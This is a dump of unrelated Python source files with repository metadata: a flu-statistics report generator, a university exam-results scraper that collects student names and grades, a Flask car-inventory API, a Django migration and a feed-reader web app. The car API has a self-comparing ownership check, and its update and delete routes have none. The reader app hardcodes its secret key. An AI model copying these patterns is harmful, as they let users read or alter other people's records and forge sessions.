module_logger.error('{} {}: Current: {} Previous: {}'.format(_format_date(date, period), continent, data_antigens.get(continent, 0), previous_data_antigens.get(continent, 0)))
diff = 0
return diff
global sContinentsForTables
if has_previous:
if date == 'all':
return ' '.join([_format_date(date, period)] + ['{:4d} ({:3d})'.format(data_antigens.get(continent, 0), diff_current_previous(continent)) for continent in sContinentsForTables[:-3]] + ['{:4d}({:4d})'.format(data_antigens.get('all', 0), data_antigens.get('all', 0) - previous_data_antigens.get('all', 0)), '{:4d} ({:3d})'.format(data_sera.get('all', 0), data_sera.get('all', 0) - previous_data_sera), '{:4d} ({:3d})'.format(data_sera_unique.get('all', 0), data_sera_unique.get('all', 0) - previous_data_sera_unique)]) + '\n'
else:
return ' '.join([_format_date(date, period)] + ['{:4d} ({:3d})'.format(data_antigens.get(continent, 0), diff_current_previous(continent)) for continent in sContinentsForTables[:-2]] + ['{:4d} ({:3d})'.format(data_sera.get('all', 0), data_sera.get('all', 0) - previous_data_sera), '{:4d} ({:3d})'.format(data_sera_unique.get('all', 0), data_sera_unique.get('all', 0) - previous_data_sera_unique)]) + '\n'
else:
return ' '.join([_format_date(date, period)] + ['{:10d}'.format(data_antigens.get(continent, 0)) for continent in sContinentsForTables[:-2]] + ['{:10d}'.format(data_sera.get('all', 0)), '{:10d}'.format(data_sera_unique.get('all', 0))]) + '\n'
# ----------------------------------------------------------------------
def _make_continent_names(period):
return '{:<10s} {}'.format(period, ' '.join('{:>10s}'.format(n) for n in (sHeader[nn] for nn in sContinentsForTables)))
# ----------------------------------------------------------------------
def _make_separator_tab(solid, eol):
if solid:
s = '{}{}'.format('-' * 143, eol)
else:
s = ' '.join((' '.join('----------' for i in range(10)), '-----------', ' ----------', '---------')) + eol
return s
# ----------------------------------------------------------------------
def _make_footer_tab():
return ''
# ======================================================================
def _make_csv(output_dir, stat):
stat = stat['antigens']
months = [m for m in sorted(stat['all']['all']) if re.match(r'^[12]\d\d\d[01]\d$', m)]
start, end = months[0], months[-1]
years = ['{:04d}'.format(y) for y in range(int(months[0][:4]), int(months[-1][:4]) + 1)]
virus_types = [v for v in sorted(stat) if v != 'B']
virus_types_s = [v.replace('BVICTORIA', 'BVic').replace('BYAMAGATA', 'BYam').replace('all', 'Total') for v in virus_types]
labs = sorted(stat['all'])
labs_s = [l.replace('all', 'Total') for l in labs]
filename = Path(output_dir, 'stat.csv') #'{}-{}.csv'.format(start, end))
module_logger.info('Writing {}'.format(filename))
with filename.open('w') as fd:
f = csv.writer(fd)
_make_csv_tab(f=f, stat=stat, title='TOTAL {}-{}'.format(start, end), year='all', labs=labs, labs_s=labs_s, virus_types=virus_types, virus_types_s=virus_types_s, empty_row=False)
for year in years:
_make_csv_tab(f=f, stat=stat, title=year, year=year, labs=labs, labs_s=labs_s, virus_types=virus_types, virus_types_s=virus_types_s, empty_row=True)
# ----------------------------------------------------------------------
def _make_csv_tab(f, stat, title, year, labs, labs_s, virus_types, virus_types_s, empty_row):
if empty_row:
f.writerow([''])
f.writerow([title])
f.writerow([''] + virus_types_s)
for lab_no, lab in enumerate(labs):
values = [stat[virus_type][lab].get(year, {}).get('all', "") for virus_type in virus_types]
f.writerow([labs_s[lab_no]] + [str(v) for v in values])
# ======================================================================
def _make_webpage(output_dir, stat):
filename = Path(output_dir, 'index.html')
module_logger.info('Writing {}'.format(filename))
content = {
'last_update': str(datetime.datetime.now()),
}
with filename.open('w') as output:
output.write('<html>\n<head>\n<meta charset="utf-8"><title>Statistics for antigens and sera found in WHO CC HI tables</title>\n')
output.write('<style type="text/css">\n<!--\n.flu-type { color: #008000; }\np.end-of-table { margin-bottom: 2em; }\n.table-in-plain-text { text-align: right; }\ntable.month td, table.year td {border: 1px solid #A0A0A0; }\ntd.number { text-align: right; padding: 0 1.5em 0 0; width: 3em; }\ntr.odd { background-color: #E0E0FF; } tr.even { background-color: white; }\nthead, tr.total { font-weight: bold; background-color: #F0E0E0; }\nthead { text-align: center; }\n\n-->\n</style></head>\n')
output.write('<body><h1>Statistics for antigens and sera found in WHO CC HI tables</h1>\n<p style="font-size: 0.7em; text-align: right">Last update: {last_update}</p>\n'.format(**content))
output.write('<ul style="margin: 1em;">\n')
for virus_type in sVirusTypeOrder:
output.write('<li><span class="flu-type" style="font-weight: bold;">{virus_type}</span> {links}</li>\n'.format(
virus_type=virus_type.replace('all', 'All flu types,'), links=' '.join('<a href="#{virus_type}-{lab}">{lab}</a>'.format(virus_type=virus_type, lab=lab_display_name(lab)) for lab in ['all'] + sLabOrder)))
output.write('</ul>\n')
output.write('<a href="stat.csv">Yearly statistics in the CSV format</a>\n')
for virus_type in sVirusTypeOrder:
output.write('<hr />\n<h2 id="{virus_type}" style="margin-bottom: 1em;"><span class="flu-type">{virus_type}</span></h2>\n'.format(virus_type=virus_type.replace('all', 'All flu types')))
for lab in ['all'] + sLabOrder:
# output.write('<hr />\n<h3 id="{virus_type}-{lab}" style="margin-bottom: 5px;"><span class="flu-type">{virus_type}</span> {lab}</h3>\n'.format(virus_type=virus_type.replace('all', 'All flu types,'), lab=lab_display_name(lab)))
output.write('<h3 id="{virus_type}-{lab}" style="margin-bottom: 1em;">{lab} {virus_type}</h3>\n'.format(virus_type=virus_type.replace('all', '(All flu types)'), lab=lab_display_name(lab)))
_make_webtable(output=output, stat=stat, virus_type=virus_type, lab=lab, period='month')
_make_webtable(output=output, stat=stat, virus_type=virus_type, lab=lab, period='year')
output.write('<div style="margin-bottom: 2em;">></div>\n')
output.write('</body>\n</html>\n')
# ----------------------------------------------------------------------
def _make_webtable(output, stat, virus_type, lab, period):
global sContinentsForTables
data_antigens = stat['antigens'].get(virus_type, {}).get(lab, {})
if data_antigens:
data_sera_unique = stat['sera_unique'].get(virus_type, {}).get(lab, {})
data_sera = stat['sera'].get(virus_type, {}).get(lab, {})
def make_total():
output.write('<tr class="total"><td class="date">TOTAL</td><td class="number">{continents}</td><td class="number">{serum}</td><td class="number">{serum_unique}</td></tr>\n'.format(continents='</td><td class="number">'.join(str(data_antigens['all'].get(continent, '')) for continent in sContinentsForTables[:-2]), serum=str(data_sera.get('all', {}).get('all', '')), serum_unique=str(data_sera_unique.get('all', {}).get('all', ''))))
output.write('<table class="{period}" style="border: 1px solid #A0A0A0; border-collapse: collapse;">\n')
output.write('<caption class="table-in-plain-text"><a href="{lab}-{virus_type}{period}-tab.txt">Table in plain text</a></caption>\n'.format(virus_type=sVirusTypeForFilename[virus_type.lower()], lab=lab.lower(), period=sPeriodForFilename[period]))
output.write('<caption class="table-in-plain-text" style="caption-side:bottom;"><a href="{lab}-{virus_type}{period}-tab.txt">Table in plain text</a></caption>\n'.format(virus_type=sVirusTypeForFilename[virus_type.lower()], lab=lab.lower(), period=sPeriodForFilename[period]))
output.write('<thead><td>{period}</td><td>{continents}</td></thead>\n'.format(period=period, continents='</td><td>'.join(sHeader[nn] for nn in sContinentsForTables)))
output.write('<tbody>\n')
make_total()
for no, date in enumerate(make_dates(data_antigens, period, reverse=True)):
output.write('<tr class="{odd_even}"><td class="date">{date}</td><td class="number">{continents}</td><td class="number">{serum}</td><td class="number">{serum_unique}</td></tr>\n'.format(odd_even="odd" if (no % 2) else "even", date=_format_date(date, period), continents='</td><td class="number">'.join(str(data_antigens[date].get(continent, '')) for continent in sContinentsForTables[:-2]), serum=str(data_sera.get(date, {}).get('all', '')), serum_unique=str(data_sera_unique.get(date, {}).get('all', ''))))
output.write('\n')
make_total()
output.write('</tbody>\n')
output.write('</table>\n')
output.write('<p class="end-of-table" />\n')
# ======================================================================
sReYearMonth = {'month': re.compile(r'^\d{6}$', re.I), 'year': re.compile(r'^\d{4}$', re.I)}
def make_dates(data, period, **sorting):
global sReYearMonth
rex = sReYearMonth[period]
return sorted((date for date in data if rex.match(date)), **sorting)
# ----------------------------------------------------------------------
def _format_date(date, period):
if date[0] == '9':
result = 'Unknown '
elif date == 'all':
result = 'TOTAL '
elif len(date) == 4 or date[4:] == '99':
if period == 'month':
result = '{}-?? '.format(date[:4])
else:
result = '{} '.format(date[:4])
else:
result = '{}-{} '.format(date[:4], date[4:])
return result
# ----------------------------------------------------------------------
def _fix_virus_type_for_previous(virus_type, previous_stat):
if virus_type not in previous_stat['antigens']:
if virus_type == "A(H3N2)":
virus_type = "H3"
elif virus_type == "A(H1N1)":
virus_type = "H1PDM"
return virus_type
# ======================================================================
|
[
"github@skepner.eu"
] |
github@skepner.eu
|
40c6be57a2548ec77ba7486a14eab9e30a750b5f
|
9849703ed6e995582e0eb354e18b3a528c68bf51
|
/datascraper.py
|
e44c83dd26904af45e7aa26123bffa05bc5b1245
|
[
"LicenseRef-scancode-other-permissive",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
vozille/Rank-list-generator
|
31535db77ccfbcee501e2d12bd40eb3658c2f6d7
|
e0ebfe003e436ebfc409cb470f0e47ae64224db8
|
refs/heads/master
| 2016-09-06T21:30:39.895080
| 2015-08-19T15:17:03
| 2015-08-19T15:17:03
| 30,417,019
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,929
|
py
|
#Anwesh Mohanty
import Tkinter
import sys
from lxml import html
import requests
from Tkinter import *
import math
import tkMessageBox
import os
import time
# import rank_generator
# import rankGenUI
number = 0
ind = ["MECHANICAL ENGINEERING ","ELECTRICAL ENGINEERING ","CIVIL ENGINEERING ","INSTRUMENTATION & ELECTRONICS ENGINEERING "\
,"COMPUTER SCIENCE & ENGINEERING ","BIO TECHNOLOGY ","INFORMATION TECHNOLOGY ","TEXTILE ENGINEERING ","FASHION TECHNOLOGY ","BACHELOR OF ARCHITECTURE "]
visited = [False]*len(ind)
subjects = [[]for i in range(len(ind))]
def formatting(a,b,c,d,e):
ans = ' Generated ' + b + ' ' + u"\u2713"
return ans
def show(n,a,path): # iterator, address
flag = True
# start = time.time()
# webAddress = "http://results.bput.ac.in/525_RES/1301106106.html"
# page=requests.get(webAddress)
# tree=html.fromstring(page.text)
# namechk = ''
# while True:
# namechk = tree.xpath("/html/body/table/tr[3]/td/table/tr[2]/td[2]/b/text()")
# end = time.time()
# if end - start > 3:
# break
# if len(namechk) > 0:
# flag = True
# else:
# flag = False
# del start
# del end
if flag:
try:
f = os.open(path,os.O_WRONLY|os.O_APPEND|os.O_CREAT)
sys.stdout = open(path,'a')
i = n
add = a
webAddress = "http://results.bput.ac.in/"+str(add)+"_RES/"
page=requests.get(webAddress+"%s.html"%str(i))
tree=html.fromstring(page.text)
name=tree.xpath("/html/body/table/tr[3]/td/table/tr[2]/td[2]/b/text()")
branch=tree.xpath("/html/body/table/tr[3]/td/table/tr[4]/td[2]/b/text()")
roll=tree.xpath("/html/body/table/tr[3]/td/table/tr[1]/td[2]/text()")
sgpa = []
count = []
if len(name) != 0:
count = tree.xpath("/html/body/table/tr[5]/td/table/tr[position() > 1]/td[1]/text()")
del count[-1]
count = map(int,count)
if len(count) != 0:
sgpa=tree.xpath("/html/body/table/tr[5]/td/table/tr[%s]/td[3]/text()"%str(len(count)+2))
if name and sgpa:
if branch[0] == "ELECTRONICS AND INSTRUMENTATION ENGINEERING. ":
branch[0] = "INSTRUMENTATION & ELECTRONICS ENGINEERING "
if name and sgpa:
grades = tree.xpath("/html/body/table/tr[5]/td/table/tr[position() > 1 and position() < %s]/td[5]/text()"%str(count[-1]+2))
sub = tree.xpath("/html/body/table/tr[5]/td/table/tr[position() > 1 and position() < %s]/td[3]/text()"%str(count[-1]+2))
grades = ''.join(grades)
if name and sgpa:
res = ind.index(branch[0]+' ')
if not visited[res]:
visited[res] = True
for i in sub:
subjects[res].append(i)
if name and sgpa:
print name[0],roll[0],branch[0],sgpa[0],grades
sys.stdout.close()
os.close(f)
ans = formatting(name[0],roll[0],branch[0],sgpa[0],grades)
return ans
else:
return '0'
except requests.ConnectionError:
app2 = Tkinter.Tk()
app2.withdraw()
tkMessageBox.showinfo("Error",'No Internet Connection')
return '-1'
else:
app2 = Tkinter.Tk()
app2.withdraw()
tkMessageBox.showinfo("Error",'Website is down :(')
return '-1'
def getSubject(path):
f = os.open(path,os.O_WRONLY|os.O_APPEND|os.O_CREAT)
sys.stdout = open(path,'w')
for i in subjects:
for j in i:
j = j.replace(' ','-')
print j,
print
sys.stdout.close()
os.close(f)
|
[
"anwesh063@gmail.com"
] |
anwesh063@gmail.com
|
ad088c4e655ae3617b31666867924e0adc3d41ab
|
c6106a6a087fb5388cd24fb550247ead3fc99f28
|
/car_inventory/api/routes.py
|
8fee2d367d551b9d3c0d6eed17c1350a12fdd419
|
[] |
no_license
|
jcnghm/Car-API-Flask
|
e52bdd940a2047f627493470739db97f080fbd21
|
2b16c289fd8b5f542d815f5c5b1f8f4547ab1009
|
refs/heads/master
| 2023-08-18T00:24:13.151394
| 2021-09-15T17:55:50
| 2021-09-15T17:55:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,494
|
py
|
from flask import Blueprint, request, jsonify
from car_inventory.helpers import token_required
from car_inventory.models import db, User, Car, car_schema, cars_schema
api = Blueprint('api', __name__, url_prefix = '/api')
@api.route('/getdata')
@token_required
def get_data(current_user_token):
return { 'The' : 'Vehicle'}
# CREATE CAR ENDPOINT
@api.route('/cars', methods = ['POST'])
@token_required
def create_car(current_user_token):
make = request.json['make']
model= request.json['model']
price = request.json['price']
trim = request.json['trim']
added_options = request.json['added_options']
dimensions = request.json['dimensions']
weight = request.json['weight']
user_token = current_user_token.token
car = Car(make, model, price, trim, added_options, dimensions, weight, user_token)
db.session.add(car)
db.session.commit()
response = car_schema.dump(car)
return jsonify(response)
# RETRIEVE ALL CARS ENDPOINT
@api.route('/cars', methods = ['GET'])
@token_required
def get_cars(current_user_token):
owner = current_user_token.token
cars = Car.query.filter_by(user_token = owner).all()
response = cars_schema.dump(cars)
return jsonify(response)
# RETRIEVE ONE CAR ENDPOINT
@api.route('/cars/<id>', methods = ['GET'])
@token_required
def get_car(current_user_token, id):
owner = current_user_token.token
if owner == current_user_token.token:
car = Car.query.get(id)
response = car_schema.dump(car)
return jsonify(response)
else:
return jsonify({'message' : 'Valid Token Required'}), 401
# UPDATE CAR ENDPOINT
@api.route('/cars/<id>', methods = ['POST', 'PUT'])
@token_required
def update_car(current_user_token, id):
car = Car.query.get(id) # Get Car Instance
car.make = request.json['make']
car.model = request.json['model']
car.price = request.json['price']
car.trim = request.json['trim']
car.added_options = request.json['added_options']
car.dimensions = request.json['dimensions']
car.weight = request.json['weight']
car.user_token = current_user_token.token
db.session.commit()
response = car_schema.dump(car)
return jsonify(response)
# DELETE CAR ENDPOINT
@api.route('/cars/<id>', methods = ['DELETE'])
@token_required
def delete_car(current_user_token, id):
car = Car.query.get(id)
db.session.delete(car)
db.session.commit()
response = car_schema.dump(car)
return jsonify(response)
|
[
"jcnghmpsEgmail.com"
] |
jcnghmpsEgmail.com
|
8332846623f1a5df6ebc02ade8a3006b33f793f4
|
6e44863b66ca27393e4df02579a17858093e964e
|
/collage_app/migrations/0007_auto_20210729_1409.py
|
33373b94c9465f0c1328baac70b798da8f5686fc
|
[] |
no_license
|
futureseadev/NFTBackend
|
297d164fb54be85c57f5ed9a9156984f4b61110e
|
aa4b027496d65801fbd203fc57d6a19fc97f507d
|
refs/heads/main
| 2023-08-24T00:01:37.484314
| 2021-11-01T00:40:46
| 2021-11-01T00:40:46
| 423,609,550
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 551
|
py
|
# Generated by Django 3.2.5 on 2021-07-29 14:09
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('collage_app', '0006_alter_serie_slug'),
]
operations = [
migrations.RenameModel(
old_name='TokenImage',
new_name='Token',
),
migrations.RemoveField(
model_name='serie',
name='license_name',
),
migrations.RemoveField(
model_name='serie',
name='total_minted',
),
]
|
[
"artsiomliaver@gmail.com"
] |
artsiomliaver@gmail.com
|
af3584ba00a8c05c57704d30781c6e67ca2600c2
|
a7215a919ce9ecd1cb09fd4a66543d99e3c1619e
|
/venv/Lib/site-packages/reader/_app/__init__.py
|
4275752bc3bd69133e4817d0c17039d0bd1cdc84
|
[] |
no_license
|
srikanthajithy/Srikanth_Assignment_3
|
2f8b14cf4b51a9ae871fede91f69d273ac8ec5a7
|
040691ae59b204aa675ad9b879bef34302c0a61d
|
refs/heads/master
| 2023-06-17T23:35:40.563258
| 2021-06-29T22:55:46
| 2021-06-29T22:55:46
| 381,516,636
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,406
|
py
|
import contextlib
import itertools
import json
import time
from dataclasses import dataclass
import flask.signals
import humanize
import markupsafe
import yaml
from flask import abort
from flask import Blueprint
from flask import current_app
from flask import flash
from flask import Flask
from flask import g
from flask import get_flashed_messages
from flask import redirect
from flask import render_template
from flask import request
from flask import Response
from flask import stream_with_context
from flask import url_for
import reader
from .api_thing import APIError
from .api_thing import APIThing
from reader import Content
from reader import Entry
from reader import EntrySearchResult
from reader import InvalidSearchQueryError
from reader import ParseError
from reader import ReaderError
from reader._plugins import Loader
blueprint = Blueprint('reader', __name__)
blueprint.app_template_filter('humanize_naturaltime')(humanize.naturaltime)
# if any plugins need signals, they need to install blinker
signals = flask.signals.Namespace()
# NOTE: these signals are part of the app extension API
got_preview_parse_error = signals.signal('preview-parse-error')
def get_reader():
if not hasattr(g, 'reader'):
g.reader = current_app.config['READER_CONFIG'].make_reader(
'app', plugin_loader=current_app.plugin_loader
)
return g.reader
def close_db(error):
if hasattr(g, 'reader'):
g.reader.close()
def stream_template(template_name_or_list, **kwargs):
template = current_app.jinja_env.get_template(template_name_or_list)
stream = template.stream(**kwargs)
stream.enable_buffering(50)
return Response(stream_with_context(stream))
@blueprint.before_app_request
def add_request_time():
start = time.monotonic()
g.request_time = lambda: time.monotonic() - start
@blueprint.before_app_request
def add_reader_version():
g.reader_version = reader.__version__
def highlighted(string):
# needs to be marked as safe so we don't need to do it everywhere in the template
# TODO: maybe use something "more semantic" than <b> (CSS needs changing too if so)
return markupsafe.Markup(
string.apply('<b>', '</b>', lambda s: str(markupsafe.escape(s)))
)
@dataclass(frozen=True)
class EntryProxy:
_search_result: EntrySearchResult
_entry: Entry
def __getattr__(self, name):
return getattr(self._entry, name)
@property
def title(self):
highlight = self._search_result.metadata.get('.title')
if highlight:
return str(highlight)
return None
@property
def feed(self):
return FeedProxy(self._search_result, self._entry)
@property
def summary(self):
highlight = self._search_result.content.get('.summary')
if highlight:
return highlighted(highlight)
return None
@property
def content(self):
rv = []
for path, highlight in self._search_result.content.items():
# TODO: find a more correct way to match .content[0].value
if path.startswith('.content[') and path.endswith('].value'):
rv.append(Content(str(highlight), 'text/plain'))
rv.append(Content(highlighted(highlight), 'text/html'))
return rv
@dataclass(frozen=True)
class FeedProxy:
_search_result: EntrySearchResult
_entry: Entry
def __getattr__(self, name):
return getattr(self._entry.feed, name)
@property
def title(self):
highlight = self._search_result.metadata.get('.feed.title')
if highlight:
return str(highlight)
return self._entry.feed.title
@blueprint.route('/')
def entries():
show = request.args.get('show', 'unread')
read = {'all': None, 'unread': False, 'read': True}[show]
has_enclosures = request.args.get('has-enclosures')
has_enclosures = {None: None, 'no': False, 'yes': True}[has_enclosures]
important = request.args.get('important')
important = {None: None, 'no': False, 'yes': True}[important]
if not request.args.get('q'):
sort = request.args.get('sort', 'recent')
assert sort in ('recent', 'random')
else:
sort = request.args.get('sort', 'relevant')
assert sort in ('relevant', 'recent', 'random')
reader = get_reader()
feed_url = request.args.get('feed')
feed = None
feed_tags = None
if feed_url:
feed = reader.get_feed(feed_url, None)
if not feed:
abort(404)
feed_tags = list(reader.get_feed_tags(feed))
args = request.args.copy()
query = args.pop('q', None)
if query is None:
def get_entries(**kwargs):
yield from reader.get_entries(sort=sort, **kwargs)
get_entry_counts = reader.get_entry_counts
elif not query:
# if the query is '', it's not a search
args.pop('sort', None)
return redirect(url_for('.entries', **args))
else:
def get_entries(**kwargs):
for sr in reader.search_entries(query, sort=sort, **kwargs):
yield EntryProxy(sr, reader.get_entry(sr))
def get_entry_counts(**kwargs):
return reader.search_entry_counts(query, **kwargs)
# TODO: render the actual search result, not the entry
# TODO: catch and flash syntax errors
# TODO: don't show search box if search is not enabled
error = None
# TODO: duplicated from feeds()
tags_str = tags = args.pop('tags', None)
if tags is None:
pass
elif not tags.strip():
# if tags is '', it's not a tag filter
return redirect(url_for('.entries', **args))
else:
try:
tags = yaml.safe_load(tags)
except yaml.YAMLError as e:
error = f"invalid tag query: invalid YAML: {e}: {tags_str}"
return stream_template(
'entries.html', feed=feed, feed_tags=feed_tags, error=error
)
kwargs = dict(
feed=feed_url,
read=read,
has_enclosures=has_enclosures,
important=important,
feed_tags=tags,
)
entries = get_entries(**kwargs, limit=request.args.get('limit', type=int))
with_counts = request.args.get('counts')
with_counts = {None: None, 'no': False, 'yes': True}[with_counts]
counts = get_entry_counts(**kwargs) if with_counts else None
try:
first = next(entries)
entries = itertools.chain([first], entries)
except StopIteration:
pass
except InvalidSearchQueryError as e:
error = f"invalid search query: {e}"
except ValueError as e:
# TODO: there should be a better way of matching this kind of error
if 'tag' in str(e).lower():
error = f"invalid tag query: {e}: {tags_str}"
else:
raise
entries = list(entries)
entries_data = None
if feed_url:
entries_data = [e.id for e in entries]
# Ensure flashed messages get removed from the session,
# otherwise they keep adding up and never disappear.
# Assumes the template will call get_flashed_messages() at some point.
# https://github.com/lemon24/reader/issues/81
get_flashed_messages()
return stream_template(
'entries.html',
entries=entries,
feed=feed,
feed_tags=feed_tags,
entries_data=entries_data,
error=error,
counts=counts,
)
@blueprint.route('/preview')
def preview():
# TODO: maybe unify with entries() somehow
url = request.args['url']
# TODO: maybe redirect to the feed we have if we already have it
# TODO: maybe cache stuff
reader = current_app.config['READER_CONFIG'].make_reader(
'default', url=':memory:', plugin_loader=current_app.plugin_loader
)
reader.add_feed(url)
try:
reader.update_feed(url)
except ParseError as e:
# give plugins a chance to intercept this
got_preview_parse_error.send(e)
# https://github.com/lemon24/reader/issues/172
# no plugin intercepted the response, so we show the feed;
# feed.last_exception will be checked in the template,
# and if there was a ParseError, it will be shown
feed = reader.get_feed(url)
entries = list(reader.get_entries())
# TODO: maybe limit
return stream_template('entries.html', entries=entries, feed=feed, read_only=True)
@blueprint.route('/feeds')
def feeds():
broken = request.args.get('broken')
broken = {None: None, 'no': False, 'yes': True}[broken]
updates_enabled = request.args.get('updates-enabled')
updates_enabled = {None: None, 'no': False, 'yes': True}[updates_enabled]
sort = request.args.get('sort', 'title')
assert sort in ('title', 'added')
error = None
args = request.args.copy()
tags_str = tags = args.pop('tags', None)
if tags is None:
pass
elif not tags.strip():
# if tags is '', it's not a tag filter
return redirect(url_for('.feeds', **args))
else:
try:
tags = yaml.safe_load(tags)
except yaml.YAMLError as e:
error = f"invalid tag query: invalid YAML: {e}: {tags_str}"
return stream_template('feeds.html', feed_data=[], error=error)
reader = get_reader()
kwargs = dict(broken=broken, tags=tags, updates_enabled=updates_enabled)
with_counts = request.args.get('counts')
with_counts = {None: None, 'no': False, 'yes': True}[with_counts]
counts = reader.get_feed_counts(**kwargs) if with_counts else None
feed_data = []
try:
feeds = reader.get_feeds(sort=sort, **kwargs)
feed_data = (
(
feed,
list(reader.get_feed_tags(feed)),
reader.get_entry_counts(feed=feed) if with_counts else None,
)
for feed in feeds
)
except ValueError as e:
# TODO: there should be a better way of matching this kind of error
if 'tag' in str(e).lower():
error = f"invalid tag query: {e}: {tags_str}"
else:
raise
# Ensure flashed messages get removed from the session.
# https://github.com/lemon24/reader/issues/81
get_flashed_messages()
return stream_template(
'feeds.html', feed_data=feed_data, error=error, counts=counts
)
@blueprint.route('/metadata')
def metadata():
reader = get_reader()
feed_url = request.args['feed']
feed = reader.get_feed(feed_url, None)
if not feed:
abort(404)
metadata = reader.get_feed_metadata(feed_url)
# Ensure flashed messages get removed from the session.
# https://github.com/lemon24/reader/issues/81
get_flashed_messages()
return stream_template(
'metadata.html',
feed=feed,
metadata=metadata,
to_pretty_json=lambda t: yaml.safe_dump(t),
)
@blueprint.route('/entry')
def entry():
reader = get_reader()
feed_url = request.args['feed']
entry_id = request.args['entry']
entry = reader.get_entry((feed_url, entry_id), default=None)
if not entry:
abort(404)
return render_template('entry.html', entry=entry)
@blueprint.route('/tags')
def tags():
reader = get_reader()
with_counts = request.args.get('counts')
with_counts = {None: None, 'no': False, 'yes': True}[with_counts]
def iter_tags():
for tag in itertools.chain([None, True, False], reader.get_feed_tags()):
feed_counts = None
entry_counts = None
if with_counts:
tags_arg = [tag] if tag is not None else tag
feed_counts = reader.get_feed_counts(tags=tags_arg)
entry_counts = reader.get_entry_counts(feed_tags=tags_arg)
yield tag, feed_counts, entry_counts
return render_template('tags.html', tags=iter_tags())
form_api = APIThing(blueprint, '/form-api', 'form_api')
@contextlib.contextmanager
def readererror_to_apierror(*args):
try:
yield
except ReaderError as e:
category = None
if hasattr(e, 'url'):
category = (e.url,)
if hasattr(e, 'id'):
category += (e.id,)
raise APIError(str(e), category)
@form_api
@readererror_to_apierror()
def mark_as_read(data):
feed_url = data['feed-url']
entry_id = data['entry-id']
get_reader().mark_entry_as_read((feed_url, entry_id))
@form_api
@readererror_to_apierror()
def mark_as_unread(data):
feed_url = data['feed-url']
entry_id = data['entry-id']
get_reader().mark_entry_as_unread((feed_url, entry_id))
@form_api(really=True)
@readererror_to_apierror()
def mark_all_as_read(data):
feed_url = data['feed-url']
entry_id = json.loads(data['entry-id'])
for entry_id in entry_id:
get_reader().mark_entry_as_read((feed_url, entry_id))
@form_api(really=True)
@readererror_to_apierror()
def mark_all_as_unread(data):
feed_url = data['feed-url']
entry_id = json.loads(data['entry-id'])
for entry_id in entry_id:
get_reader().mark_entry_as_unread((feed_url, entry_id))
@form_api
@readererror_to_apierror()
def mark_as_important(data):
feed_url = data['feed-url']
entry_id = data['entry-id']
get_reader().mark_entry_as_important((feed_url, entry_id))
@form_api
@readererror_to_apierror()
def mark_as_unimportant(data):
feed_url = data['feed-url']
entry_id = data['entry-id']
get_reader().mark_entry_as_unimportant((feed_url, entry_id))
@form_api(really=True)
@readererror_to_apierror()
def delete_feed(data):
feed_url = data['feed-url']
get_reader().delete_feed(feed_url)
@form_api
@readererror_to_apierror()
def add_feed(data):
feed_url = data['feed-url'].strip()
assert feed_url, "feed-url cannot be empty"
# TODO: handle FeedExistsError
get_reader().add_feed(feed_url)
@form_api
@readererror_to_apierror()
def update_feed_title(data):
feed_url = data['feed-url']
feed_title = data['feed-title'].strip() or None
get_reader().set_feed_user_title(feed_url, feed_title)
@form_api
@readererror_to_apierror()
def add_metadata(data):
feed_url = data['feed-url']
key = data['key']
get_reader().set_feed_metadata_item(feed_url, key, None)
@form_api
@readererror_to_apierror()
def update_metadata(data):
feed_url = data['feed-url']
key = data['key']
try:
value = yaml.safe_load(data['value'])
except yaml.YAMLError as e:
raise APIError("invalid JSON: {}".format(e), (feed_url, key))
get_reader().set_feed_metadata_item(feed_url, key, value)
@form_api
@readererror_to_apierror()
def delete_metadata(data):
feed_url = data['feed-url']
key = data['key']
get_reader().delete_feed_metadata_item(feed_url, key)
@form_api
@readererror_to_apierror()
def update_feed_tags(data):
feed_url = data['feed-url']
feed_tags = set(data['feed-tags'].split())
reader = get_reader()
tags = set(reader.get_feed_tags(feed_url))
for tag in tags - feed_tags:
reader.remove_feed_tag(feed_url, tag)
for tag in feed_tags - tags:
reader.add_feed_tag(feed_url, tag)
@form_api(really=True)
@readererror_to_apierror()
def change_feed_url(data):
feed_url = data['feed-url']
new_feed_url = data['new-feed-url'].strip()
# TODO: when there's a way to validate URLs, use it
# https://github.com/lemon24/reader/issues/155#issuecomment-673694472
get_reader().change_feed_url(feed_url, new_feed_url)
@form_api
@readererror_to_apierror()
def enable_feed_updates(data):
feed_url = data['feed-url']
get_reader().enable_feed_updates(feed_url)
@form_api
@readererror_to_apierror()
def disable_feed_updates(data):
feed_url = data['feed-url']
get_reader().disable_feed_updates(feed_url)
@form_api
@readererror_to_apierror()
def update_feed(data):
# TODO: feed updates should happen in the background
# (otherwise we're tying up a worker);
# acceptable only because /preview does it as well
feed_url = data['feed-url']
get_reader().update_feed(feed_url)
# for some reason, @blueprint.app_template_global does not work
@blueprint.app_template_global()
def additional_enclosure_links(enclosure, entry):
funcs = getattr(current_app, 'reader_additional_enclosure_links', ())
for func in funcs:
yield from func(enclosure, entry)
def create_app(config):
app = Flask(__name__)
app.secret_key = 'secret'
app.config['READER_CONFIG'] = config
app.teardown_appcontext(close_db)
app.register_blueprint(blueprint)
# NOTE: this is part of the app extension API
app.reader_additional_enclosure_links = []
app.plugin_loader = loader = Loader()
def log_exception(message, cause):
app.logger.exception("%s; original traceback follows", message, exc_info=cause)
# Don't raise exceptions for plugins, just log.
# Does it make sense to keep going after initializing a plugin fails?
# How do we know the target isn't left in a bad state?
loader.handle_import_error = log_exception
loader.handle_init_error = log_exception
# Fail fast for reader plugin import/init errors
# (although depending on the handler they may just be logged).
with app.app_context():
get_reader()
loader.init(app, config.merged('app').get('plugins', {}))
return app
|
[
"yarramajith@gmail.com"
] |
yarramajith@gmail.com
|
d9a58437e924d5c26e735dd9567430f0c5d9125b
|
29333e514bb8e4bc18105175c8d7a0b63390c7ce
|
/cf.py
|
7d7ef0c10ed3e3f8fc1943a1bcc7e41d70dcef14
|
[] |
no_license
|
ElectronicStructureUdeM/scripts
|
39a836de7e2a4446a12ce480119ef0abd17afcdf
|
1320aebabc68d1c3fa804d5f07730573a2fe9197
|
refs/heads/master
| 2020-07-29T14:47:24.407050
| 2020-04-07T01:24:26
| 2020-04-07T01:24:26
| 209,847,285
| 1
| 1
| null | 2020-04-07T01:24:27
| 2019-09-20T17:37:17
|
Python
|
UTF-8
|
Python
| false
| false
| 1,672
|
py
|
